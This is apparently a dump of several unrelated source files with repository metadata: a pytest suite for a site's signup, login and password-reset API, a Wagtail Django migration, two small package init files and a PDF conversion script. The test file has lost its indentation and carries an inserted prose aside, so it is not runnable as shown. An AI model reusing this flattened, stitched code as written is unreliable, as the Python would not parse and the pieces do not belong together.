with auth_api_session() as (auth_api, metadata_interceptor):
assert auth_api.UsernameValid(auth_pb2.UsernameValidReq(username="test")).valid
with auth_api_session() as (auth_api, metadata_interceptor):
assert not auth_api.UsernameValid(auth_pb2.UsernameValidReq(username="")).valid
def test_basic_signup(db):
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b.com"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.SENT_SIGNUP_EMAIL
# read out the signup token directly from the database for now
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == "a@b.com").one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.SignupTokenInfo(auth_pb2.SignupTokenInfoReq(signup_token=signup_token))
assert reply.email == "a@b.com"
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
# make sure we got the right token in a cookie
with session_scope() as session:
token = session.query(User, UserSession).filter(User.username == "frodo").one().UserSession.token
assert get_session_cookie_token(metadata_interceptor) == token
def test_basic_login(db):
# Create our test user using signup
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
# backdoor to find login token
with session_scope() as session:
entry = session.query(LoginToken).one()
login_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
reply_token = get_session_cookie_token(metadata_interceptor)
with session_scope() as session:
token = (
session.query(UserSession)
.filter(User.username == "frodo")
.filter(UserSession.token == reply_token)
.one_or_none()
)
assert token
# log out
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Deauthenticate(empty_pb2.Empty(), metadata=(("cookie", f"couchers-sesh={reply_token}"),))
def test_login_tokens_invalidate_after_use(db):
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
with session_scope() as session:
login_token = session.query(LoginToken).one().token
with auth_api_session() as (auth_api, metadata_interceptor):
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
session_token = get_session_cookie_token(metadata_interceptor)
with auth_api_session() as (auth_api, metadata_interceptor), pytest.raises(grpc.RpcError):
# check we can't login again
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
def test_banned_user(db):
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
with session_scope() as session:
login_token = session.query(LoginToken).one().token
with session_scope() as session:
session.query(User).one().is_banned = True
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError):
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
def test_deleted_user(db):
test_basic_signup(db)
with session_scope() as session:
session.query(User).one().is_deleted = True
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
def test_invalid_token(db):
user1, token1 = generate_user()
user2, token2 = generate_user()
wrong_token = random_hex(32)
with real_api_session(wrong_token) as api, pytest.raises(grpc.RpcError) as e:
res = api.GetUser(api_pb2.GetUserReq(user=user2.username))
assert e.value.code() == grpc.StatusCode.UNAUTHENTICATED
assert e.value.details() == "Unauthorized"
def test_password_reset(db, fast_passwords):
user, token = generate_user(hashed_password=hash_password("mypassword"))
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.ResetPassword(
auth_pb2.ResetPasswordReq(
user=user.username,
)
)
with session_scope() as session:
token = session.query(PasswordResetToken).one().token
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.CompletePasswordReset(auth_pb2.CompletePasswordResetReq(password_reset_token=token))
with session_scope() as session:
user = session.query(User).one()
assert user.hashed_password is None
def test_password_reset_no_such_user(db):
user, token = generate_user()
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.ResetPassword(
auth_pb2.ResetPasswordReq(
user="nonexistentuser",
)
)
with session_scope() as session:
res = session.query(PasswordResetToken).one_or_none()
assert res is None
def test_password_reset_invalid_token(db, fast_passwords):
password = random_hex()
user, token = generate_user(hashed_password=hash_password(password))
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.ResetPassword(
auth_pb2.ResetPasswordReq(
user=user.username,
)
)
with session_scope() as session:
token = session.query(PasswordResetToken).one().token
with auth_api_session() as (auth_api, metadata_interceptor), pytest.raises(grpc.RpcError) as e:
res = auth_api.CompletePasswordReset(auth_pb2.CompletePasswordResetReq(password_reset_token="wrongtoken"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_TOKEN
with session_scope() as session:
user = session.query(User).one()
assert user.hashed_password == hash_password(password)
def test_logout_invalid_token(db):
# Create our test user using signup
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
# backdoor to find login token
with session_scope() as session:
entry = session.query(LoginToken).one()
login_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
reply_token = get_session_cookie_token(metadata_interceptor)
# delete all login tokens
with session_scope() as session:
session.query(LoginToken).delete()
# log out with non-existent token should still return a valid result
with auth_api_session() as (auth_api, metadata_interceptor):
auth_api.Deauthenticate(empty_pb2.Empty(), metadata=(("cookie", f"couchers-sesh={reply_token}"),))
reply_token = get_session_cookie_token(metadata_interceptor)
# make sure we set an empty cookie
assert reply_token == ""
def test_signup_invalid_birthdate(db):
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b.com"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.SENT_SIGNUP_EMAIL
# read out the signup token directly from the database for now
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == "a@b.com").one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.SignupTokenInfo(auth_pb2.SignupTokenInfoReq(signup_token=signup_token))
assert reply.email == "a@b.com"
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="9999-12-31", # arbitrary future birthdate
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_BIRTHDATE
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="ceelo",
name="Christopher",
city="New York City",
birthdate="2000-12-31", # arbitrary birthdate older than 18 years
gender="Helicopter",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="franklin",
name="Franklin",
city="Los Santos",
birthdate="2004-04-09", # arbitrary birthdate around 17 years
gender="Male",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_BIRTHDATE
def test_invalid_signup_token_info(db):
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.SignupTokenInfo(auth_pb2.SignupTokenInfoReq(signup_token="notarealtoken"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_TOKEN
def test_signup_invalid_email(db):
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b."))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b.c"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
def test_signup_existing_email(db):
# Signed up user
user, _ = generate_user()
# Attempt to signup again with the same email
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=user.email))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.EMAIL_EXISTS
def test_successful_authenticate(db, fast_passwords):
user, _ = generate_user(hashed_password=hash_password("password"))
# Authenticate with username
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=user.username, password="password"))
assert not reply.jailed
# Authenticate with email
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=user.email, password="password"))
assert not reply.jailed
def test_unsuccessful_authenticate(db, fast_passwords):
user, _ = generate_user(hashed_password=hash_password("password"))
# Invalid password
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=user.username, password="incorrectpassword"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
# Invalid username
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user="notarealusername", password="password"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
# Invalid email
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(
auth_pb2.AuthReq(user=f"{random_hex(12)}@couchers.org.invalid", password="password")
)
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
# Invalid id
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user="-1", password="password"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
testing_email = f"{random_hex(12)}@couchers.org.invalid"
# No Password
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=testing_email))
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == testing_email).one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=testing_email, password="password"))
assert e.value.code() == grpc.StatusCode.FAILED_PRECONDITION
assert e.value.details() == errors.NO_PASSWORD
def test_successful_login(db):
user, _ = generate_user()
# Valid email login
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=user.email))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.NEED_PASSWORD
# Valid username login
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=user.username))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.NEED_PASSWORD
def test_unsuccessful_login(db):
# Invalid email, user doesn't exist
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=f"{random_hex(12)}@couchers.org.invalid"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
# Invalid id
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="-1"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
# Invalid username
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="notarealusername"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
testing_email = f"{random_hex(12)}@couchers.org.invalid"
# No Password
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=testing_email))
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == testing_email).one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=testing_email))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
def test_complete_signup(db):
testing_email = f"{random_hex(12)}@couchers.org.invalid"
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=testing_email))
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == testing_email).one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
# Invalid username
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username=" ",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_USERNAME
with auth_api_session() as (auth_api, metadata_interceptor):
# Invalid name
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name=" ",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_NAME
with auth_api_session() as (auth_api, metadata_interceptor):
# Hosting status required
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Frodo",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=None,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.HOSTING_STATUS_REQUIRED
user, _ = generate_user()
with auth_api_session() as (auth_api, metadata_interceptor):
# Username unavailable
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username=user.username,
name="Frodo",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.USERNAME_NOT_AVAILABLE
with auth_api_session() as (auth_api, metadata_interceptor):
# Invalid coordinate
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Frodo",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=0,
lng=0,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_COORDINATE
# CompleteChangeEmail tested in test_account.py
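These tests follow standard pytest conventions (the db, fast_passwords, and auth_api_session fixtures come from tests.test_fixtures), so an individual test can be run through pytest's Python entry point. The invocation below is an assumption based on the file path in this record; the repository may wrap this in its own tooling.
# Hypothetical invocation; equivalent to running
#   pytest app/backend/src/tests/test_auth.py -k test_basic_login
import pytest

pytest.main(["app/backend/src/tests/test_auth.py", "-k", "test_basic_login"])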
| 39.045455
| 114
| 0.646017
| 2,797
| 24,052
| 5.294601
| 0.086879
| 0.077993
| 0.051995
| 0.065636
| 0.850901
| 0.839895
| 0.823013
| 0.809575
| 0.783713
| 0.770275
| 0
| 0.014254
| 0.259147
| 24,052
| 615
| 115
| 39.108943
| 0.816825
| 0.041078
| 0
| 0.67679
| 0
| 0
| 0.042515
| 0.010379
| 0
| 0
| 0
| 0
| 0.130152
| 1
| 0.047722
| false
| 0.088937
| 0.021692
| 0.002169
| 0.071584
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 7
| fe5d5cc5ee688eb8893125c2dfffc38956ebdf6d
| 5,215
| py
| Python
| wtknowledgebase/migrations/0001_initial.py
| skruger/wagtail-knowledgebase
| cb92640b3394a14c75b3629f0582c8a070fddd95
| ["MIT"]
| 1
| 2021-05-03T23:52:09.000Z
| 2021-05-03T23:52:09.000Z
| wtknowledgebase/migrations/0001_initial.py
| skruger/wagtail-knowledgebase
| cb92640b3394a14c75b3629f0582c8a070fddd95
| ["MIT"]
| null | null | null
| wtknowledgebase/migrations/0001_initial.py
| skruger/wagtail-knowledgebase
| cb92640b3394a14c75b3629f0582c8a070fddd95
| ["MIT"]
| null | null | null
|
# Generated by Django 3.0.10 on 2020-09-15 22:27
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wtknowledgebase.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailcore', '0045_assign_unlock_grouppagepermission'),
]
operations = [
migrations.CreateModel(
name='KbArticlePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock()), ('card', wagtail.core.blocks.StructBlock([('header_title', wagtail.core.blocks.RichTextBlock(required=False)), ('card_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card'", required=False)), ('card_header_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-header'", required=False)), ('card_body_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-body'", required=False)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock())]))])), ('grid_row', wagtail.core.blocks.StructBlock([('class_name', wagtail.core.blocks.CharBlock(required=False)), ('cells', wagtail.core.blocks.ListBlock(wtknowledgebase.blocks.GridCellBlock))]))])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='KbCategoryPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock()), ('card', wagtail.core.blocks.StructBlock([('header_title', wagtail.core.blocks.RichTextBlock(required=False)), ('card_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card'", required=False)), ('card_header_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-header'", required=False)), ('card_body_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-body'", required=False)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock())]))])), ('grid_row', wagtail.core.blocks.StructBlock([('class_name', wagtail.core.blocks.CharBlock(required=False)), ('cells', wagtail.core.blocks.ListBlock(wtknowledgebase.blocks.GridCellBlock))]))])),
('category_name', models.CharField(max_length=250)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='KbIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock()), ('card', wagtail.core.blocks.StructBlock([('header_title', wagtail.core.blocks.RichTextBlock(required=False)), ('card_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card'", required=False)), ('card_header_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-header'", required=False)), ('card_body_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-body'", required=False)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock())]))])), ('grid_row', wagtail.core.blocks.StructBlock([('class_name', wagtail.core.blocks.CharBlock(required=False)), ('cells', wagtail.core.blocks.ListBlock(wtknowledgebase.blocks.GridCellBlock))]))])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
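For context, this auto-generated migration freezes a StreamField shared by the three page types; a minimal sketch of what the source model behind KbArticlePage might have looked like (a reconstruction under Wagtail 2.x-era imports, simplified to the four leaf block types):
from wagtail.core import blocks
from wagtail.core.fields import StreamField
from wagtail.core.models import Page
from wagtail.images.blocks import ImageChooserBlock

class KbArticlePage(Page):
    # Simplified sketch: the 'card' and 'grid_row' StructBlocks that the
    # migration above freezes are omitted here.
    body = StreamField([
        ('richtext', blocks.RichTextBlock()),
        ('image', ImageChooserBlock()),
        ('quote', blocks.BlockQuoteBlock()),
        ('page', blocks.PageChooserBlock()),
    ])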
| 94.818182 | 1,157 | 0.695302 | 568 | 5,215 | 6.290493 | 0.15669 | 0.153932 | 0.218864 | 0.087322 | 0.88553 | 0.88553 | 0.88553 | 0.88553 | 0.88553 | 0.860341 | 0 | 0.005083 | 0.132311 | 5,215 | 54 | 1,158 | 96.574074 | 0.78453 | 0.008821 | 0 | 0.574468 | 1 | 0 | 0.17844 | 0.007354 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.12766 | 0 | 0.212766 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fe6d4a2c7f56ba72d9709cb34aa68b3b8caf93bd | 130 | py | Python | scCloud/scCloud/pipeline/__init__.py | broadinstitute/scRNA-Seq | 03aafb92274a97f4d634ac9e42f0e0feca91ed98 | ["BSD-3-Clause"] | 12 | 2019-04-08T11:39:33.000Z | 2022-02-22T02:50:27.000Z | scCloud/scCloud/pipeline/__init__.py | broadinstitute/scRNA-Seq | 03aafb92274a97f4d634ac9e42f0e0feca91ed98 | ["BSD-3-Clause"] | null | null | null | scCloud/scCloud/pipeline/__init__.py | broadinstitute/scRNA-Seq | 03aafb92274a97f4d634ac9e42f0e0feca91ed98 | ["BSD-3-Clause"] | 3 | 2019-03-06T20:44:33.000Z | 2020-02-17T13:43:46.000Z |
from .pipeline import run_pipeline
from .demuxEM_pipeline import run_demuxEM_pipeline
from .cite_seq import run_cite_seq_pipeline
| 32.5 | 50 | 0.884615 | 20 | 130 | 5.35 | 0.35 | 0.252336 | 0.317757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092308 | 130 | 3 | 51 | 43.333333 | 0.90678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
228ceae5c798d1cd4446a777e4f7fc43c18f0c7a | 55 | py | Python | pynet/__init__.py | iavr/pynet | 09f3500e12a72c63699c74c34573539bfdc3ea12 | ["BSD-2-Clause"] | 3 | 2019-12-11T15:09:58.000Z | 2020-12-29T05:54:40.000Z | pynet/__init__.py | iavr/pynet | 09f3500e12a72c63699c74c34573539bfdc3ea12 | ["BSD-2-Clause"] | null | null | null | pynet/__init__.py | iavr/pynet | 09f3500e12a72c63699c74c34573539bfdc3ea12 | ["BSD-2-Clause"] | null | null | null |
# Explicit relative imports (the original used Python 2-style implicit
# relative imports, which fail in a Python 3 package __init__).
from .lib import *
from .lib import __
from .net import *
| 13.75 | 18 | 0.745455 | 9 | 55 | 4.333333 | 0.444444 | 0.358974 | 0.666667 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218182 | 55 | 3 | 19 | 18.333333 | 0.906977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
fe04bd177d7f393fbc34de7fb1eef6bedfd1122c | 123 | py | Python | test/test_convert.py | laashub-sua/demo-print | 76665ffa6e3bd675ffa111ff6c3aabed9b5ea6ec | ["Apache-2.0"] | null | null | null | test/test_convert.py | laashub-sua/demo-print | 76665ffa6e3bd675ffa111ff6c3aabed9b5ea6ec | ["Apache-2.0"] | null | null | null | test/test_convert.py | laashub-sua/demo-print | 76665ffa6e3bd675ffa111ff6c3aabed9b5ea6ec | ["Apache-2.0"] | null | null | null |
import convert_pdf_2_jpg
if __name__ == '__main__':
convert_pdf_2_jpg.do_convert(r'files/test_convert_pdf_2_jpg.pdf')
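For reference, a hedged sketch of what do_convert might wrap (the module's actual implementation is not shown here; pdf2image and its convert_from_path helper are an assumption):
# from pdf2image import convert_from_path
#
# def do_convert(pdf_path):
#     # Render each PDF page and save it as a JPEG next to the source file.
#     for i, page in enumerate(convert_from_path(pdf_path)):
#         page.save(f'{pdf_path}.{i}.jpg', 'JPEG')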
